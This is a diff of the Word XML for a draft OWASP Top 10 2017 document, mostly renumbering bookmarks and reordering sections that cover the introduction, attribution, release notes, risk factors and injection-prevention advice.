-        <w:t>Welcome to the OWASP Top 10 2017! This major update adds several new issues, including two issues selected by the community - A8:2017-Deserialization and A10:2017-Insufficient logging and monitoring. Community feedback also drove the collection of the most amount of data ever assembled in the preparation of an application security standard, and so we are confident that the remaining 8 issues are the most important for organizations to address, particularly the A3:2017-Exposure of Sensitive Data in the age of the EU's General Data Protection Regulation, A5:2017-Misconfiguration especially around cloud and API services, and A9:2017 Known Vulnerabilities, which can be especially challenging for those on modern platforms, like node.js.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The OWASP Top 10 for 2017 is based primarily on TBA large datasets from firms that specialize in application security, including TBA consulting companies and TBA product vendors. This data spans vulnerabilities gathered from hundreds of organizations and over 114,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="warnings"/>
-      <w:bookmarkEnd w:id="13"/>
       <w:r>
         <w:rPr/>
         <w:t>Warnings</w:t>
@@ -1670,102 +1664,102 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="attribution"/>
+      <w:bookmarkStart w:id="13" w:name="attribution"/>
+      <w:bookmarkEnd w:id="13"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Attribution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>We'd like to thank the many organizations that contributed their vulnerability prevalence data to support the 2017 update, including these large data set providers:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Aspect Security, AsTech Consulting, Branding Brand, Contrast Security, EdgeScan, iBLISS, Minded Security, Paladion Networks, Softtek, Vantage Point, Veracode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>We would like to thank in advance those who contribute significant constructive comments and time reviewing this update to the Top 10 and to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>TBA (List of contributors from GitHub issues)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>And finally, we'd like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="__RefHeading___Toc2359_410054668"/>
+      <w:bookmarkStart w:id="15" w:name="rn-release-notes"/>
       <w:bookmarkEnd w:id="14"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>Attribution</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>We'd like to thank the many organizations that contributed their vulnerability prevalence data to support the 2017 update, including these large data set providers:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Aspect Security, AsTech Consulting, Branding Brand, Contrast Security, EdgeScan, iBLISS, Minded Security, Paladion Networks, Softtek, Vantage Point, Veracode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>We would like to thank in advance those who contribute significant constructive comments and time reviewing this update to the Top 10 and to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>TBA (List of contributors from GitHub issues)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>And finally, we'd like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="__RefHeading___Toc2370_1944273953"/>
-      <w:bookmarkStart w:id="16" w:name="rn-release-notes"/>
       <w:bookmarkEnd w:id="15"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>RN Release Notes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="what-changed-from-2013-to-2017"/>
       <w:bookmarkEnd w:id="16"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>RN Release Notes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="what-changed-from-2013-to-2017"/>
-      <w:bookmarkEnd w:id="17"/>
       <w:r>
         <w:rPr/>
         <w:t>What changed from 2013 to 2017?</w:t>
@@ -2342,11 +2336,33 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="new-issues-supported-by-data"/>
+      <w:bookmarkStart w:id="17" w:name="new-issues-supported-by-data"/>
+      <w:bookmarkEnd w:id="17"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>New issues, supported by data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>A4:2017-XML External Entity (XXE) is a new category primarily supported by SAST data sets, but when discovered by penetration testers and dynamic tools, this new issue allows attackers to disclose internal information, scan internal systems, and possibly perform denial of service attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="new-issues-supported-by-the-community"/>
       <w:bookmarkEnd w:id="18"/>
       <w:r>
         <w:rPr/>
-        <w:t>New issues, supported by data</w:t>
+        <w:t>New issues, supported by the community</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2356,7 +2372,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>A4:2017-XML External Entity (XXE) is a new category primarily supported by SAST data sets, but when discovered by penetration testers and dynamic tools, this new issue allows attackers to disclose internal information, scan internal systems, and possibly perform denial of service attacks.</w:t>
+        <w:t>We asked the community to provide insight into two forward looking weakness categories. After 550 peer submissions, and after removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are A8:2017-Deserialization, responsible for one of the worst breaches of all time, and A10:2017-Insufficient Logging and Monitoring, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2364,30 +2380,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="new-issues-supported-by-the-community"/>
+      <w:bookmarkStart w:id="19" w:name="retired-but-not-forgotten"/>
       <w:bookmarkEnd w:id="19"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>New issues, supported by the community</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>We asked the community to provide insight into two forward looking weakness categories. After 550 peer submissions, and after removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are A8:2017-Deserialization, responsible for one of the worst breaches of all time, and A10:2017-Insufficient Logging and Monitoring, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="retired-but-not-forgotten"/>
-      <w:bookmarkEnd w:id="20"/>
       <w:r>
         <w:rPr/>
         <w:t>Retired, but not forgotten</w:t>
@@ -2458,22 +2452,22 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="__RefHeading___Toc2372_1944273953"/>
-      <w:bookmarkStart w:id="22" w:name="f-details-about-risk-factors"/>
+      <w:bookmarkStart w:id="20" w:name="__RefHeading___Toc2361_410054668"/>
+      <w:bookmarkStart w:id="21" w:name="f-details-about-risk-factors"/>
+      <w:bookmarkEnd w:id="20"/>
       <w:bookmarkEnd w:id="21"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+F Details about Risk factors</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="top-10-risk-factor-summary"/>
       <w:bookmarkEnd w:id="22"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>+F Details about Risk factors</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="top-10-risk-factor-summary"/>
-      <w:bookmarkEnd w:id="23"/>
       <w:r>
         <w:rPr/>
         <w:t>Top 10 Risk Factor Summary</w:t>
@@ -3854,8 +3848,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="additional-risks-to-consider"/>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkStart w:id="23" w:name="additional-risks-to-consider"/>
+      <w:bookmarkEnd w:id="23"/>
       <w:r>
         <w:rPr/>
         <w:t>Additional Risks To Consider</w:t>
@@ -4172,13 +4166,107 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="__RefHeading___Toc2374_1944273953"/>
-      <w:bookmarkStart w:id="26" w:name="r-about-risks"/>
+      <w:bookmarkStart w:id="24" w:name="__RefHeading___Toc2363_410054668"/>
+      <w:bookmarkStart w:id="25" w:name="r-about-risks"/>
+      <w:bookmarkEnd w:id="24"/>
       <w:bookmarkEnd w:id="25"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>+R About Risks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="about-risks"/>
       <w:bookmarkEnd w:id="26"/>
       <w:r>
         <w:rPr/>
-        <w:t>+R About Risks</w:t>
+        <w:t>About risks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>During the creation of the OWASP Top 10 2017, we asked the community how they would like the issues to be presented. The overwhelming majority of respondents asked for risk-based ranking. It would be simpler for us to use prevalence only, or breach only ordering, because we have solid access data on that, but then we wouldn't be presenting risks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>ISO 31000 is the international standard for risk management. We aim to adhere to that standard, but we only include technical impact, and not business impact. Every ISO 31000 compliant organization adopting the OWASP Top 10 should add their business impact to our calculations. Why is this important? Consider the case where a CMS is used as a public website by one organization, and as a health records system by another. The data asset, risks and threats are very different, and yet the software is the same.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>We present three likelihood factors:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Exploitability - based upon our combined experience of if the issue is difficult to exploit requiring advanced skills uncommon in the industry, average, or easy (automated)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Prevalence - comes unmodified from the 114,000 application data set</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Detectability - difficult or blind, average or easy (automated) detection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Impact is purely a technical impact, which we based upon our experience, history of breaches using this issue, and reputable sources such as the annual Verizon Data Breach Incident Report.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4186,102 +4274,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="about-risks"/>
+      <w:bookmarkStart w:id="27" w:name="defining-our-terms"/>
       <w:bookmarkEnd w:id="27"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>About risks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>During the creation of the OWASP Top 10 2017, we asked the community how they would like the issues to be presented. The overwhelming majority of respondents asked for risk-based ranking. It would be simpler for us to use prevalence only, or breach only ordering, because we have solid access data on that, but then we wouldn't be presenting risks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>ISO 31000 is the international standard for risk management. We aim to adhere to that standard, but we only include technical impact, and not business impact. Every ISO 31000 compliant organization adopting the OWASP Top 10 should add their business impact to our calculations. Why is this important? Consider the case where a CMS is used as a public website by one organization, and as a health records system by another. The data asset, risks and threats are very different, and yet the software is the same.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>We present three likelihood factors:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="14"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Exploitability - based upon our combined experience of if the issue is difficult to exploit requiring advanced skills uncommon in the industry, average, or easy (automated)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="14"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Prevalence - comes unmodified from the 114,000 application data set</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="14"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Detectability - difficult or blind, average or easy (automated) detection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Impact is purely a technical impact, which we based upon our experience, history of breaches using this issue, and reputable sources such as the annual Verizon Data Breach Incident Report.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="defining-our-terms"/>
-      <w:bookmarkEnd w:id="28"/>
       <w:r>
         <w:rPr/>
         <w:t>Defining our terms</w:t>
@@ -4693,10 +4687,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="__RefHeading___Toc2376_1944273953"/>
-      <w:bookmarkStart w:id="30" w:name="a1-injections"/>
+      <w:bookmarkStart w:id="28" w:name="__RefHeading___Toc2365_410054668"/>
+      <w:bookmarkStart w:id="29" w:name="a1-injections"/>
+      <w:bookmarkEnd w:id="28"/>
       <w:bookmarkEnd w:id="29"/>
-      <w:bookmarkEnd w:id="30"/>
       <w:r>
         <w:rPr/>
         <w:t>A1 Injections</w:t>
@@ -4925,11 +4919,53 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="am-i-vulnerable-to-attack"/>
+      <w:bookmarkStart w:id="30" w:name="am-i-vulnerable-to-attack"/>
+      <w:bookmarkEnd w:id="30"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. In many cases, it is recommended to avoid the interpreter, or disable it (e.g., XXE), if possible. For SQL calls, use bind variables in all prepared statements and stored procedures, or avoid dynamic queries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find use of interpreters and trace data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="31" w:name="how-do-i-prevent"/>
       <w:bookmarkEnd w:id="31"/>
       <w:r>
         <w:rPr/>
-        <w:t>Am I vulnerable to attack?</w:t>
+        <w:t>How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4939,27 +4975,49 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. In many cases, it is recommended to avoid the interpreter, or disable it (e.g., XXE), if possible. For SQL calls, use bind variables in all prepared statements and stored procedures, or avoid dynamic queries.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find use of interpreters and trace data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</w:t>
+        <w:t>Preventing injection requires keeping untrusted data separate from commands and queries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>If (1) is not available, you should escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Positive or "white list" input validation is also recommended, but is not a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4967,72 +5025,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="how-do-i-prevent"/>
+      <w:bookmarkStart w:id="32" w:name="example-scenarios"/>
       <w:bookmarkEnd w:id="32"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Preventing injection requires keeping untrusted data separate from commands and queries.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>If (1) is not available, you should escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Positive or "white list" input validation is also recommended, but is not a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="example-scenarios"/>
-      <w:bookmarkEnd w:id="33"/>
       <w:r>
         <w:rPr/>
         <w:t>Example Scenarios</w:t>
@@ -5129,20 +5123,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="references"/>
+      <w:bookmarkStart w:id="33" w:name="references"/>
+      <w:bookmarkEnd w:id="33"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="34" w:name="owasp"/>
       <w:bookmarkEnd w:id="34"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="35" w:name="owasp"/>
-      <w:bookmarkEnd w:id="35"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -5325,8 +5319,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="external"/>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkStart w:id="35" w:name="external"/>
+      <w:bookmarkEnd w:id="35"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -5427,10 +5421,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="__RefHeading___Toc2378_1944273953"/>
-      <w:bookmarkStart w:id="38" w:name="a2-authentication"/>
+      <w:bookmarkStart w:id="36" w:name="__RefHeading___Toc2367_410054668"/>
+      <w:bookmarkStart w:id="37" w:name="a2-authentication"/>
+      <w:bookmarkEnd w:id="36"/>
       <w:bookmarkEnd w:id="37"/>
-      <w:bookmarkEnd w:id="38"/>
       <w:r>
         <w:rPr/>
         <w:t>A2 Authentication</w:t>
@@ -5659,124 +5653,124 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="am-i-vulnerable-to-attack-1"/>
+      <w:bookmarkStart w:id="38" w:name="am-i-vulnerable-to-attack-1"/>
+      <w:bookmarkEnd w:id="38"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Evidence of identity, authentication and session management are critical for separating malicious unauthenticated attackers with users who you might have a legal relationship.</w:t>
